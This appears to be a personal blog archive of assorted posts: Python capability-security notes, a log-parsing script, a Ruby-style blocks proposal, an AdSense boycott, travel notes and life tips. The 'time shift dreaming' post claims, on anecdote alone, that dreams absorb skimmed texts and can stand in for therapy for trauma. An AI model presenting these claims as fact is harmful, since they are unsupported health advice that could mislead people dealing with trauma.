As someone who loved readings quotations as a kid, I was super excited when Mamading told me about his idea a few days ago.

There is a lot of wisdom in quotes. A lot for all of us to learn from. Unfortunately, the websites I've seen dedicated to quotations are way too cluttered for my tastes.

In contrast, the initial version of Quotessence offers something much cleaner. Just go to the website and you are presented with a single quote to take away. You can even limit it to quotes from just a single author, e.g. Epigrams in Programming by Alan Perlis.

Quotessence is showing a lot of promise for a first release. And the upcoming features sound quite nice too:

• Twitter integration: follow @Quotessence for regular intakes of words from the wise.
• Unix fortune files support.
• Addition of a lot more authors/quotations.

For the programmers there's even a JSON-based API. You can limit it to an individual author, e.g. http://quotessence.agoraworx.com/api/perlis and even specify an optional callback parameter for JSON-P usage.

For example, to get the following random quote from the eminently quotable Mamading:

Just do:

$.getJSON(
    "http://quotessence.agoraworx.com/api/mamading?callback=?",
    function (data) {
        $('#epigraph-content').text(data.quote);
        $('<a />').attr(
          'href', 'http://quotessence.agoraworx.com/' + data.deck
        ).text(data.author).appendTo('#epigraph-attribution');
    }
);

All in all this is a great start! And I'd be even more excited if Quotessence would allow for quotes on Twitter to be captured easily — sort of like a bash.org for Twitter…

Check out Quotessence and hassle Mamading on Twitter @evangineer with your thoughts/praise ;p

Hundreds of people have — knowingly or not — had a direct impact on my work/vision. Their belief, inspiration, energy, encouragement, suggestions, criticisms, support (both emotional and financial), tasty treats and hard work has been phenomenal!

I'd like to reward them with some life-time ¤ pecu allocations.

Since I'm not making any pecu payouts at the moment, they're not worth much yet — but I hope one day that those who've helped me will feel the gratitude =)

See below for the full list of pecu allocations.

The following individuals have put in a lot to make my vision a reality and I'd like to reward them with ¤200,000 each:

• Alex Tomkins
• Brian Deegan
• Chris Macrae
• Cris Pearson
• Daniel Biddle
• Danny Bruder
• David Pinto
• Inderpaul Johar
• James Arthur
• Jeffry Archambeault
• John McCane-Whitney
• Liliana Avrushin
• Luke Graybill
• Mamading Ceesay
• Martyn Hurt
• Matthieu Rey-Grange
• Mathew Ryden
• Nadine Gahr
• Nathan Staab
• Narmatha Murugananda
• Navaratnam Para
• Nicholas Midgley
• Øyvind Selbek
• Sofia Bustamante
• Sean B. Palmer
• Stefan Plantikow
• Tim Jenks
• Tiziano Cirillo
• Tom Salfield
• Yan Minagawa

The following beautiful creatures have helped at various critical junctures or laid key foundations. For this they get ¤20,000 each:

• Aaron Swartz
• Adam Langley
• Ade Thomas
• Adnan Hadzi
• Alex Greiner
• Alex Pappajohn
• Allen Short
• Andreas Dietrich
• Andrew Kenneth Milton
• Anne Biggs
• Anne Helene Wirstad
• Anette Hvolbæk
• Bryce Wilcox-O'Hearn
• Charles Goodier
• Chris Wood
• Claire Colvin
• David Bovill
• Derek Richards
• Eric Hopper
• Eric Wahlforss
• Erik Möller
• Erol Ziya
• Ephraim Spiro
• Fenton Whelan
• Fergus Doyle
• Gary Alexander
• Gloria Charles
• Guido van Rossum
• Guilhem Buzenet
• Itamar Shtull-Trauring
• Jacob Everist
• Jill Lundquist
• Jim Carrico
• Jo Walsh
• Joe Short
• Joerg Baach
• John Hurliman
• Josef Davies-Coates
• Henri Cattan
• Henry Hicks
• Ka Ho Chan
• Karin Kylander
• Karina Arthur
• Katie Miller
• Kisiyane Roberts
• Laura Tov
• Lesley Williams
• Lucie Rey-Grange
• Mark Poole
• Maria Glauser
• Maria X
• Matthew Sellwood
• Matthew Skinner
• Mayra Graybill
• Mia Bittar
• Mohan Selladurai
• Neythal (Sri Lanka)
• Nolan Darilek
• Olga Zueva
• Paul Böhm
• Phillip J. Eby
• Pierre-Antoine Tetard
• Ricky Cousins
• Saritah
• Saul Albert
• Shalabh Chaturvedi
• Simeon Scott
• Simon Michael
• Simon Fox
• Simon Reynolds
• Stephan Karpischek
• Steve Alexander
• Suhanya Babu
• Tavin Cole
• Thamilarasi Siva
• Tim Berners-Lee
• Tom Owen-Smith
• Vanda Petanjek
• Xiao Xuan Guo

These lovely supporters get ¤2,000 each:

• Adam Burns
• Adam Karpierz (Poland)
• Adam Perfect
• Adam Wern
• Adir Tov
• Agathe Pouget-Abadie
• Al Tepper
• Alan Wagenberg
• Alex Bustamante
• Alexander Wait (USA)
• Alice Fung
• Ana Sandra Ruiz Entrecanales
• Andreas Kotes
• Andreas Schwarz
• Andrius Kulikauskas
• Andy Dawkins
• Andy McKay
• Andrew M. Kuchling
• Andrew McCormick
• Angela Beesley
• Anna Gordon-Walker
• Anna Rothkopf
• Annalisa Fagan
• Anne Doyle
• Anselm Hook
• Ante Pavlov
• Arani Siva
• Ashley Siple
• Auro Tom Foxtrot
• Azra Gül
• Beatrice Wessolowski
• Ben Pirt
• Ben Swartz
• Benjamin Geer
• Benny “Curus” Amorsen
• Bernard Lietaer
• Blake Ludwig
• Boian Rodriguez Nikiforov
• Bram Cohen
• Brandon Wiley
• Bree Morrison
• Brenton Bills
• Brian Coughlan
• Briony “Misadventure” (UK)
• Callum Beith
• Candie Duncan
• Carl Ballard Swanson
• Chai Mason
• Chris Cook
• Chris Davis
• Chris Heaton
• Chris McDonough
• Chris Withers
• Christoffer Hvolbaek
• Christopher Satterthwaite
• Christopher Schmidt
• Clara Maguire
• Cory Doctorow
• Craig Hubley
• Cyndi Rhoades
• Damiano Vukotić
• Dan Brickley
• Daniel Harris
• Daniel Magnoff
• Dante-Gabryell Monson
• David Bausola
• David Cozens
• David Goodger
• David Mertz
• David Midgley
• David Mills
• David Saxby
• Darren Platt
• Debra Bourne (UK)
• Dharushana Muthulingam
• Dermot ? (UK)
• Dimitrius Savvaidis
• Dominik Webb
• Donatella Bernstein
• Dymitri Kleine
• Earle Martin
• Edward Saperia
• Eléonore De Prunelé
• Elisabet Sahtouris
• Elkin Gordon Atwell
• Elmar Geese
• Emma Wigley
• Emmanuel Baidoo
• Erik Stewart
• Fabian Kyrielis
• Farhan Rehman
• Femi Longe
• Felicity Wood
• Felix Iskwei
• Florence David
• Francesca Cerletti (UK)
• Francesca Romana Giordano
• Gabe Wachob
• Gabrielle Hamm
• Gareth Strangemore-Jones
• Gary Poster
• Gaurav Pophaly
• Gavin Starks
• Gemma Youlia Dillon
• Geoff Jones
• Geoffry Arias
• George Nicholaides
• Giles Mason
• Glyph Lefkowitz
• Gordon Mohr
• Grant Stapleton
• Greg Timms
• Gregor J. Rothfuss
• Guy Kawasaki
• Hannah Harris
• Harriet Harris
• Heather Wilkinson
• Helen Aldritch
• Henry Bowen
• Holly Lloyd
• Holly Porter
• Howard Rheingold
• Ian Clarke
• Ian Hogarth
• Ida Norheim-Hagtun
• Igor Tojcic
• Ilze Black
• Inge Rochette
• James Binns
• James Cox (UK)
• James Howison (Australia)
• James Hurrell
• James McKay (Switzerland)
• James Stevens
• James Sutherland
• James Wallace
• Jan-Klaas Kollhof
• Jane Moyses
• Javier Candeira
• Jeannie Cool
• Jeremie Miller
• Jessica Bridges-Palmer
• Jim Ley
• Jimmy Wales
• Joanna O'Donnell
• Joe Geldart (UK)
• Joey DeVilla
• John Bywater
• John Cassidy
• John Lea
• John “Sayke” ?
• Joi Ito
• Jon Bootland
• Jonathan Robinson
• Joni Davis ?
• Jose Esquer
• Joseph O'Kelly (UK)
• Joy Green
• Juan Pablo Rico
• Jubin Zawar
• Judith Martin
• Julia Forster
• Jurgen Braam
• Justin O’Shaughnessy (UK)
• Ka-Ping Yee
• Kapil Thangavelu
• Karen Hessels
• Katerina ?
• Katja Strøm Cappelen
• Kath Short
• Katie Keegan
• Katie Prescott
• Katy Marks
• Kelly Teamey
• Ken Manheimer
• Kevin Hemenway
• Kevin Marks
• Kiran Jonnalagadda
• Kiyoto Kanda
• Lanchanie Dias Gunawardena
• Laura Scheffler
• Lauri Love
• Leon Rocha
• Lena Nalbach
• Leslie Vuchot
• Lewis Hart
• Libby Miller
• Lion Kimbro
• Lisa Colaco
• Lord Kimo
• Lottie Child
• Lucas Gonzalez
• Luke Francl
• Luke Kenneth Casson Leighton
• Luke Nicholson
• Lynton Currill Kim-Wai Pepper
• Magnolia Slimm
• Manuel Sauer
• Maor Bar-Ziv
• Marco Herry
• Mark Brown
• Mark Chaplin
• Mark Hodge
• Mark S. Miller
• Markus Quarta
• Marguerite Smith
• Marshall Burns
• Martin Peck
• Mary Fee
• Matt Cooperrider
• Matthew Devney
• Mattis Manzel
• Mayra Vivo Torres
• Meghan Benton
• Meera Shah
• Menka Parekh
• Michael Linton
• Michael Sparks
• Michel Bauwens
• Mike Linksvayer
• Mikey Weinkove
• Mitchell Jacobs
• Molly Webb
• Moraan Gilad
• Mostofa Zaman
• Navindu Katugampola
• Nathalie Follen
• Nick Hart-Williams
• Nick Ierodiaconou
• Nick Szabo
• Nicolas David
• Niels Boeing (Germany)
• Nishant Shah
• Noa Harvey
• Oliver Morrison
• Oliver Sylvester-Bradley
• Pamela McLean
• Paola Desiderio
• Paolo “xerox” Martini (UK)
• Pascale Scheurer
• Patrick Andrews
• Patrick Yiu
• Paul Everitt
• Paul Harrison
• Paul Mutton (UK)
• Paul Pesach
• Paul Robinett
• Peri Urban
• Pete Brownwell
• Petit-Pigeard Clotilde
• Phil G
• Phil Harris
• Piccia Neri
• Pietro Speroni di Fenizio
• R. David Murray
• Rama Gheerawo
• Raph Levien
• Rasmacone Boothe
• Rasmus Tenbergen
• Rastko ?
• Ray Murray
• Raymond Hettinger
• Rayhan Omar
• Rebecca Harding
• Reem Martin
• Riccarda Zezza
• Rob Lord
• Robert De Souza
• Robert Kaye
• Robert Knowles
• Robin Upton
• Rodney Shakespeare
• Rohit Khare
• Roman Nosov
• Ricardo Niederberger Cabral
• Richard Ford
• Richard Nelson
• Richard “coldfyre” Nicholas (USA)
• Roger Dingledine
• Romek Szczesniak
• Ross Evans (UK)
• Rufus Pollock
• Salim Fadhley (UK)
• Salim Virani
• Sam Brown
• Sam Geall
• Sam Joseph
• Sara Kiran
• Selas Mene
• Seger Céline
• Servane Mouazan
• Shahid Choudhry
• Shane Hughes
• Simon Bartlet
• Simon Persoff
• Simon Rawles
• Sonia Ali
• Sophie ? (Austria)
• Sophie Le Barbier
• Stan Rey-Grange
• Stefan Baker
• Steffi Dayalan
• Stella Boeva
• Stephen Wilmot
• Steve Jenson
• Steve Peake
• Steven Starr
• Su Nandy
• Suw Charman
• Sunir Shah
• Sym Von LynX
• Tamsin Lejeune
• Tanis Taylor
• Tansy E Huws
• Tess Ashwin
• Tim Wacker (USA)
• Tom D. Harry (UK)
• Tom Heiser
• Tom Longson
• Tom Williams
• Tommy Hutchinson
• Toni Prug
• Toni Sola
• Tony Cook
• Tyler Eaves
• Ushani Suresh
• Veeral ?
• William Wardlaw-Rogers
• Wayne Siron
• Wes Felter
• Wybo Wiersma
• Zoe Young

And, finally, whilst I'm not currently making any pecu allocations to them, I feel deeply indebted to these visionaries, musicians, coders and writers:

• A. R. Rahman
• Alan Kay
• Asian Dub Foundation
• Au Revoir Simone
• Bruce Sterling
• Buckminster Fuller (passed away)
• Daft Punk
• David Lynch
• Douglas Engelbart
• Fernando Perez
• India Arie
• Jeff Buckley (passed away)
• Kim Stanley Robinson
• Lawrence Lessig
• M.I.A.
• Mahatma Gandhi (passed away)
• Manu Chao
• Marc Stiegler
• Mark Pilgrim
• Marlena Shaw
• Massive Attack
• Michael Franti
• Muhammad Yunus
• Neal Stephenson
• Nouvelle Vague
• P.M.
• Paul Graham
• Peter Norvig
• Portishead
• Ray Charles (passed away)
• Ray Ozzie
• Richard P. Gabriel
• Tanya Stephens
• Ted Nelson
• Tim Peters
• Vannevar Bush (passed away)
• Vint Cerf

Thank you all!

Start designing today!

by xkcd

It is essential that all designs serve multiple purposes. That is, it should not be obvious that they are for sex. That is just tacky. Having a Love Swing in your living room is a sure way to give your guests the creeps!

Instead, check out the Tantra Chair (Warning: NSFW). This classy eco-friendly fuck chair could easily blend in as part of the regular living room furniture. Lovers can be comfortable. Guests have a nice seat =)

Variation is important to a healthy sex life. And the physical elements in our homes should be designed to facilitate this! Otherwise the tendency is to fall back on the same old positions/routines and that is just painful!!

Take the bathroom as an example. Sex whilst showering together is great fun! Yet most houses have poorly designed bathrooms/showers in this regard. You have to perform some acrobatics to get the heights and angles right.

So many good moments are lost because the design wasn't good enough to help make it happen. But if enterprising designers would work at this, it would make for a better world. Not least, it would open the doorways of imagination to even more possibilities than what we have today!

by Pensiero

Tip 10: Time Shift Dreaming

We spend a significant amount of time sleeping. It's important for many things — not least memory consolidation.

But you can take advantage of this time to improve youself:

• Come up with creative solutions
• Learn new things
• Resolve emotional hangups

How? Using a methodology that I call “Time Shift Dreaming”.

I discovered this method rather accidentally when I was about 6 years old. My parents had told me that the spirit of our ancestors were always watching over us — and being a gullible child, I'd believed them.

And one day, I did something which I wasn't proud of. And fearing the wrath of these all knowing spirits, I tried to figure out how to go back in time.

For days after, I sat around day dreaming — replaying the events of the past but imagining how I would have reacted differently.

The guilt passed and these flights of fancy became a regular habit. I fancied myself a Lord of Time and would “jump” into different timelines/universes and explore alternative realities.

But there weren't enough hours in a day for these fantasies, so I started setting up scenarios just before I would drift off to sleep:

• Choose a point in time to jump to — in the past or future
• Define my reason for being there
• Start exploring the new “reality” as I gradually fell asleep

This is what I now call time shift dreaming.

I spent most of my youth in these fantasies — both awake and asleep. But somehow, despite not spending much time reading my textbooks — I'd just skim them for an overview — I seemed to be excelling at my studies.

This was always a puzzle to me — how did I know things which I had't studied? Instead of actually studying the damned texts, I would be fantasising about what I would be doing in the future with the knowledge I would have by studying the texts.

Years later, Mamading Ceesay would have an answer for me. He postulates that by skimming the texts and then exploring scenarios related to their content in my dreams, I was somehow actually reading the texts!!

Let me break that one down. We have a relatively high level of bandwidth for taking in information. The problem is in the processing of it. It takes time to actually understand the content. But what if we offload this to dream time?

If we trust that our pre-conscious mind will somehow remember every page we look at — no matter how briefly — then we can rely on it to process the information for us. All we need to do is to give it focus — which is achieved by doing the scenario setup for the dream — tada!!

It seems that in my dreams I was doing something similar to those in the famous basketball experiment. And the current research on mirror neurons seems to back up the act of “assuming” knowledge during the dreams.

by ToniVC

I also use time shift dreaming to come up with creative solutions to problems — by jumping into a future scenario where I've solved the problem.

And often I wake up with solutions. Be warned that this particular use of the technique sometimes takes a few iterations though…

But the practice that has really helped me a lot is jumping into the past. This is the reason that I started entertaining these fantasies in the first place — to re-explore the past.

By doing this I've managed to resolve many of the emotional traumas in my life. Most people generally suppress unpleasant events. The lucky ones pay expensive therapists to help get beyond these.

By re-exploring the past in time shift dreaming, I've found that I can practice self therapy and just resolve these myself!

Simply put yourself into a past scenario which you wish could have been different and explore different realities. Watch and listen. Try out different actions on behalf of yourself and everyone else involved.

Keep repeating this — making subtle changes every time. If a scenario proves to be too painful to re-live directly, work on it gradually. Explore related scenarios until you are comfortable enough.

And, eventually, you'll reach a turnaround and find yourself much happier. Not only will you have gained much better understanding of the events, but hopefully you also gained a better understanding of everyone else's actions.

I've used this to good effect and have been able to overcome traumas like growing up in a civil war/genocide and being homeless as a teenager. My anxieties and anger replaced by love and forgiveness.

Again, according to Mr. Ceesay, what's happening here is something akin to anchoring. In my dreams, I'm anchoring pleasant experiences in place of the unpleasant ones.

Whether this is true or not I do not know. Whether any of this will work for you I do not know. All I know is that it works for me. And by sharing I hope I've provided some useful insights for you.

It would be interesting to see how everyone else finds time shift dreaming though. If you're up for it, why don't you have a go? Perhaps even blog about your ongoing experience?

You can leave a link in the comments below for others to follow.

By trying this out independently we could figure out what does work for everyone and what doesn't. At the very least, it's an extremely fun and addictive form of escapism. Enjoy and let me know how it fares for you!

And, oh, let me know if you'd care to know any other life tips of mine or whether this is enough for one life time ;p

Matthieu was my housemate of 2 years @ Brushfield Riva and is the best housemate that I've ever had!

He is one of the kindest souls that one is ever likely to meet and a real pleasure to hang out with.

Wise, talented, fun, interesting, helpful — everything that one could ever hope for in a friend, one finds with Matt.

He not only turned around my impression of the French, but also gave me reasons to appreciate many aspects of its culture.

Lots of love to you brother and happy birthday!!

[Blog, Twitter #googlestrike and Facebook this as much as you can — Thanks!]

This is a call to boycott Google AdSense until they change their new monitoring policy to be opt-in.

Earlier today, Google announced that they will be monitoring everybody's online activity. This is clearly a violation of their “Don't Be Evil” policy.

In their quest to serve more targeted ads, Google will now start tracking the sites that we all visit. They can do this because a lot of sites use Google AdSense.

And every time we visit these sites running AdSense, Google will know exactly where we've been. This is an extreme breach of privacy! We must act now or risk handing over our privacy permanently.

So this is a call to all network admins — in homes, offices, university campuses, ISPs and anywhere else — to please add the following 2 lines to your hosts file:

127.0.0.1   pagead2.googlesyndication.com
127.0.0.1   googlesyndication.com

If you are not an admin, then get in touch with whoever runs your local home/office/ISP/university networks and get them to make the change.

By doing this, you will disable Google's tracking as well as take away their revenue — an online equivalent of boycotting. If it is not made clear that our privacy is important, the rest of the industry will simply follow Google's lead even further.

So when should we stop boycotting Google AdSense? When they make it opt-in instead of the current opt-out they provide on their ad preferences page.

It's like having an invisible spy camera following you around

The problem with opt-out is that most users simply don't understand the technical details. As Tim Berners-Lee points out it's like having an invisible spy camera following you around.

Most people simply don't even know that it's there! And worse, with Google's current implementation, you have to opt-out from every browser and machine you ever use!! This is outrageous!

If Google would make this opt-in on the other hand, I will happily let them know what my interests are so that they can serve me more relevant ads. There is value in behavioural targetting and Google can derive the same value without having to intrude on our privacy.

But letting Google know my interests is one thing and letting them know every website that I ever visit is a different matter altogether. For that, if some users want to help Google, then fine, let them do so and let them opt-in.

Countries like France are already planning to take away net neutrality — with their upcoming anti-P2P law, illegal filesharers will be denied internet access for up to a year and open Wi-Fi hotspots will only be allowed to give access to whitelisted sites.

With unhealthy legislation/censorship like this being forced upon the world, we really don't need Google adding to our pains and taking away what little privacy we have left.

I'll update this blog article if/when Google do reverse their policy to opt-in. Keep it bookmarked so that you can stop the boycott =)

Please comment, blog, twitter #googlestrike and facebook this as much as you can — Thanks!

Athini is Sofia's sister and was our host when we decided to spend a month away in Ibiza. She's been living there for a few years now and made our stay super nice.

Leo, the father of her adorable 3-year old Sky, picked us up from the airport and dropped us off at Casita Verde where she was teaching Tai chi.

Casita Verde was everything that I had not expected from Ibiza.

It turns out that there is more to the island of Eivissa than the clubbing scenes that we're familiar with. Seemingly limited to the “English” part of the island where fat girls walk around semi-naked, the rest of the island is rather tranquil and magical.

Casita Verde itself is an interesting eco-centre situated in a beautiful valley. The people who gathered there were very interesting to talk to and the organic meals they served were delicious!!

And as luck would have it, the DJ was playing music by my old housemate Saritah which endeared myself to the place even more.

After hanging around there for a while, Athini took us to her home. She'd managed to find a villa for us to stay that was only a few minutes drive from her house — we were going to be neighbours for a month!

The Can Paloma Villa, owned by an eccentric German artist called Eckhard Neumann, was absolutely gorgeous!

Normally rented out to groups of a dozen-odd people, Sofia and I had the whole place to ourselves. And thanks to visiting off-season, it cost less than the rent for our tiny flat in the UK!

Over the next month, Sofia and I worked away on our laptops — disconnected from the rest of the world and the internet.

Athini, Leo and little Sky gave us great company which stopped us going insane from cabin fever. And the visits from Ecki and Schnusch (his cute dog) were an absolute delight.

But it wasn't all hunky dory. I managed to fall ill with some chest infection and had to be nursed back to good health by Sofia. Alright, alright, this was actually really nice ;p

But it turned out that the inhabitants of Ibiza were in a really bad shape economically. Being way-too-dependent on tourism, the finances of everyone were cyclical — great in the summer, crap in the winter.

Clubs like Pacha were dead even though they had a lot of space for interesting things to happen. Talented people were sitting at home without jobs or money.

This is quite a sorry state and reflective of the global economy as a whole. Fundamentally, we do not lack the resources or man-power to make things viable. It's simply a question of whether we can co-ordinate them effectively.

And I think Ibiza provides an excellent opportunity for such a venture to be attempted. If the collective resources and talent could be applied effectively, there is nothing stopping the inhabitants of Ibiza from being able to have an extremely high quality of life all year round.

Mamading's article on Local Community Economics for Security in an Unstable World (Spanish version) is an interesting read in this regard.

Who'd be interested in making this happen? Let me know!

Guido van Rossum posted a blog article on Capabilities for Python. As I'd instigated this whole thread, I figure I should give everyone an update… (along with a quick summary of the story so far).

The aim has been to enable object-capability in Python. Python already supports doing the following — a port of the sample in Mark S. Miller's Capability-based Financial Instruments:

def Mint(name):

    sealer, unsealer = makeBrandPair(name)

    def __str__():
        return "%s's mint" % name

    def Purse(purse_name, balance):

        this = Attr(balance=balance)

        def decr(amount):
            if (this.balance - amount) < 0:
                raise ValueError("Can't decrement balance below 0.")
            this.balance -= amount

        def __str__():
            return "%s has %i %s bucks" % (purse_name, this.balance, name)

        def getBalance():
            return this.balance

        def sprout():
            return Purse('from %s:' % purse_name, 0)

        def getDecr():
            return sealer.seal(decr)

        def deposit(amount, src):
            unsealer.unseal(src.getDecr())(amount)
            this.balance += amount

        return Namespace(
            decr, __str__, getBalance, sprout, getDecr, deposit
            )

    return Namespace(__str__, Purse)

Two utility functions are used to make life easier for developers:

• Namespace returns an object which behaves similarly to “standard” class-based objects.
• Attr provides a utility object to get beyond scope limitations pre-Python 3.0

Using this functional approach, we can start our journey towards object capability in Python =)

First, we need to ensure that a user can't get hold of the global state somehow. Whilst a lot of existing Python libraries use global state, there is nothing in the core language itself that requires this to be the case.

So we needed to identify the attributes of built-in types which “leak” global state, e.g.

• FunctionType.func_globals
• FrameType.f_locals

I issued a security challenge which helped identify a number of these and am following it up by doing a manual audit of the CPython implementation to further verify the “final” list of leak attributes.

[If anyone wants to help, please get in touch — tav@espians.com]

Assuming we do identify the full list — there are only so many builtin types and attributes in Python after all! — we can start with a clean slate and do object-capability in Python. I explain in detail in my earlier blog article on Securing the Python Interpreter.

The short of it is that this can be enabled today in about 100 odd lines of code by removing the “leak” variables using Python's ctypes module — see safelite.py for a simple implementation. And for contexts like App Engine, where ctypes isn't accessible, I provided a small patch for the interpreter itself.

The next problem is in making as much of the existing standard library accessible. As Guido rightly points out in his blog article, most people aren't going to use a capability-secure subset of Python if it doesn't offer any value!!

And given that no-one is going to volunteer to rewrite the entire standard library, I figured we could take a short cut by using minimal wrappers *wink*.

This would be great, but there's been one last (identified) hurdle: some of Python's builtins automatically call certain class-based protocols, e.g. __int__, __iter__, etc. for type coercion, iteration, etc.

And to make matters worse certain builtins like input evaluate in the calling scope! But we can bypass this — unless someone tells me otherwise — by putting a type guard in front of our functions. I've written a guard decorator in the latest safelite.py to make this easier — let me know if it works for you.

We are using a functional approach anyhow, so the class-based protocols are meaningless. Thus no real functionality should be lost. It'd just make wrapping the existing standard library much much easier.

And with that, the stage is hopefully set to herald a new future. Here is the implementation of a file reader which wraps Python's builtin open:

@guard(filename=str, mode=str, buffering=int)
def FileReader(filename, mode='r', buffering=0):
    """A secure file reader."""

    if mode not in ['r', 'rb', 'rU']:
        raise ValueError("Only read modes are allowed.")

    fileobj = open_file(filename, mode, buffering)

    def __repr__():
        return '<FileReader: %r>' % filename

    def close():
        fileobj.close()

    @guard(bufsize=int)
    def read(bufsize=-1):
        return fileobj.read(bufsize)

    @guard(size=int)
    def readlines(size=-1):
        return fileobj.readlines(size)

    @guard(offset=int, whence=int)
    def seek(offset, whence=0):
        fileobj.seek(offset, whence)

    return Namespace(__repr__, close, read, readlines, seek)

Code which has a reference to FileReader would be able to read files but — assuming we've identified all the leak attributes — never be able to get a reference to the “real” file_open which FileReader uses internally.

Code can pass on references to read() to other code without exposing a reference to seek(), etc.

The final key bit missing is a secure import. For this, I've been working on something called pimp which will allow for remote loading of code using object capability principles over HTTP in a manner similar to the Web Calculus.

And with that, this update has come to a close. Do get in touch if any of this interests you and you'd like to work together!

And, as always, let me know your thoughts in the comments below. Thanks!

Now if you run a blog there are lots of services to help you analyse your traffic. Personally, I find Google Analytics to be pretty good. But there's a slight problem. It's not real-time.

Even if you use this “trick”, you are still lagged by a few hours. I am happy to wait for the detailed analysis that Analytics gives me, but I want some basic info in real-time.

Seeing as I'm running the blog on my own server, it's just a question of parsing the Apache access logs. But despite my efforts, I couldn't find a really simple parser for these logs.

All I care about is:

• What are people currently looking at?
• Who and how many people are visiting?
• Where are they coming from? Who is referring to me?

Failing to find a simple script, I initially just ran commands like:

grep "^tav" access.2009-03-* | awk '{print $12}' | sort | uniq

But this got slightly annoying after a while, so I wrote a simple script. I wrote this just for myself, but if anyone is interested, here it is: logrep.py

Running:

./logrep.py access.2009-03-* -what -total

outputs <number-of-total-requests> <number-of-requests-from-unique-ips> <url-requested>:

1009    668     /a-challenge-to-break-python-security.html
6298    1023    /feed.rss
10595   8912    /ruby-style-blocks-in-python.html

There's a similar:

./logrep.py access.2009-03-* -where -total -prune

where -prune combines together urls with different ?query-strings:

1014    972     http://news.ycombinator.com/
2966    2904    http://www.reddit.com/

And:

./logrep.py access.2009-03-* -who -total

which outputs the obvious total number of visitors (unique ip addresses), e.g.:

18314

You can pass in some additional filters:

• --vhost tav.espians.com will filter on just requests to that vhost.
• -all will include statistic for requests which weren't served successfully, e.g. 404s, 301s, etc.
• --ignore /favicon.ico,/robots.txt will filter out requests to the given list of URLs.

Again, I wrote this just for myself. But like with all my work, I'm placing it in the public domain if anyone else fancies using it: logrep.py

Enjoy!

Blocks are supposedly the most liked feature in Ruby. This proposal would enable a similar feature in Python:

using webapp.runner do (config):
    config.time_zone = 'UTC'
    config.log_level = 'debug'

Compare that to the Ruby equivalent:

Rails::Initializer.run do |config|
    config.time_zone = 'UTC'
    config.log_level = :debug
end

Unless I am missing something fundamental, adding a do statement seems to lend itself to doing blocks in a Pythonic way.

For those of you that don't know Ruby, blocks are simply syntactic sugar for defining anonymous functions/closures.

This is already possible in Python using the rather complicated-looking lambda keyword:

employees.select(lambda e: e.salary > developer.salary)

In contrast, Ruby provides the really sexy:

employees.select {|e| e.salary > developer.salary}

Where lambda limits Python developers to just expressions, Ruby allows for full multi-line blocks:

employees.select do |emp|
    if emp.salary > developer.salary
        fireEmployee(emp)
    else
        extendContract(emp)
    end
end

This is also possible in Python but at the needless cost of naming and defining a function first:

def throwaway_function(emp):
    if emp.salary > developer.salary:
        return fireEmployee(emp)
    else:
        return extendContract(emp)

employees.select(throwaway_function)

This is where my proposed do statement comes in, it would simplify the above to:

using employees.select do (emp):
    if emp.salary > developer.salary:
        return fireEmployee(emp)
    else:
        return extendContract(emp)

Which is hopefully simple and Pythonic enough to everyone's tastes to make this a reality for Python 2.7 and 3.1.

To facilitate this the grammar would need to be extended to something like:

using_stmt ::=
  "using" expression "do" [parameter_list] ":" suite

And when the do keyword is encountered, functionality should be delegated to a __do__ function in the same way that the import keyword delegates to __import__.

The delegation should map the following syntax:

using EXPR do PARAM_LIST:
    BLOCK_CODE

into the function call:

__do__(expr, callback, globals, locals)

Where callback is a function named ‘<callback>’ compiled with PARAM_LIST as its parameter_list and BLOCK_CODE as the function body. Like with import, globals() and locals() should be from the scope of the do statement.

As a starting point for discussion, I would like to propose the following as the default __do__ function:

def __do__(expr, callback, globals, locals):
    retval = None
    while 1:
        try:
            args = expr.send(retval)
            if not isinstance(args, tuple):
                args = (args,)
            retval = callback(*args)
        except StopIteration:
            break

This works thanks to Python's support of coroutines through generators [PEP 342] and would cover the common case of a generator instance being passed in as the EXPR.

And it just so happens to mirror the semantics of Ruby blocks quite beautifully:

>>> def generator():
...     yield
...     yield

>>> using generator() do:
...     print "hello world"
hello world
hello world

The only aspect missing is Ruby's block_given? but that could easily be supported by alternative __do__ implementations if the need arises.

I expect the dominant usage of blocks to be for the creation of DSLs. This has almost become an art form in the Ruby world — with everything from Rake tasks to Rails configuration being done through mini-DSLs built using blocks.

It would be interesting to see what the Python world comes up with. The ability to custom define __do__ would allow Python hackers to do some really cool shit with blocks that Ruby hackers can't do for the moment.

And I can imagine a lot of existing frameworks like Twisted, Trellis, Eventlet and Django becoming even more simplified and powerful thanks to blocks.

What do you think?

Idealist Addendum:

Whilst I believe the above should suit Guido's taste, I am not so sure of the following. But in an ideal world, he would give it his blessing, so here goes =)

Ideally the do statement would map the following syntax:

using EXPR1 do EXPR2:
    BLOCK_CODE

into the function call:

__do__(expr1, expr2, block_code, indent_level, globals, locals)

This would give the __do__ function even more flexibility at very little cost. By default, EXPR2 would be treated as PARAM_LIST and together with BLOCK_CODE it would be compiled into the callback function described above.

But more enterprising __do__ functions could do interesting things like rewriting the AST of the BLOCK_CODE. Given that this is already done by many many Python libraries, it's not much of a stretch of the imagination. The benefit? Super nice Pythonic DSLs!

Anyways, that's enough ranting for one morning. What do you think? Let me know in the comments or on the Python-Dev mailing list.

— Thanks, @tav

So I need your help. Because I know fuck all about filming or editing.

Despite creating the likes of green.tv and setting up an entire company to provide online video services, my knowledge of film making is close to non-existent.

If you want to know about scalable online distribution or digital video encoding, then I can give you expert advice. But film making? Not a clue.

The closest I've ever gotten to actual editing was as part of the Video Production Society at Dulwich College. Back then it was mostly analog and Adobe Premiere 1.0 just gave me lots of headaches.

So as I get back into it over 15 years later, my setup is:

• Core 2 Duo 2.4Ghz Macbook w/ 4GB of RAM
• External 1TB Networked Hard Drive
• iLife '08, iWork '09
• Final Cut Express, Logic Express

Is this good enough? I didn't go for the Pro versions given the price and decided to ease myself in with the Express versions. Would iMovie have been enough?

What are tutorials, podcasts and websites I should check out to get started very quickly?

As for the video capturing process, should I shell out on an actual camera or is something like the Flip good enough to get started with?

by Vincent Laforet

I've been drooling over the Canon 5D Mark II. It produces the stunning visuals you see in this article!!

I don't of course expect to produce anything quite so spectacular yet. But if one day I could afford to buy it, would it be any better than a Flip in the hands of a newbie like myself?

And, finally, instead of hosting the videos myself, it seems that it's better to put them up on sites with active communities.

I've signed up to Vimeo for this as they seem to have really vibrant and artistic community. Is this a good choice?

Have any of you been video blogging or film making? What have your experiences been? Am I approaching all this completely wrong?

Please let me know any thoughts you may have in the comments. Thanks!

This thought-provoking video is worth watching:

It reinforces the words of Mamading Ceesay: "The whole world is going to be experiencing environmentally-induced ADHD pretty soon".

Which leads me to worry about the social implications of this increasing pace. Being able to overcome information overload and limiting your attention to what really matters to you is going to be absolutely vital in the future.

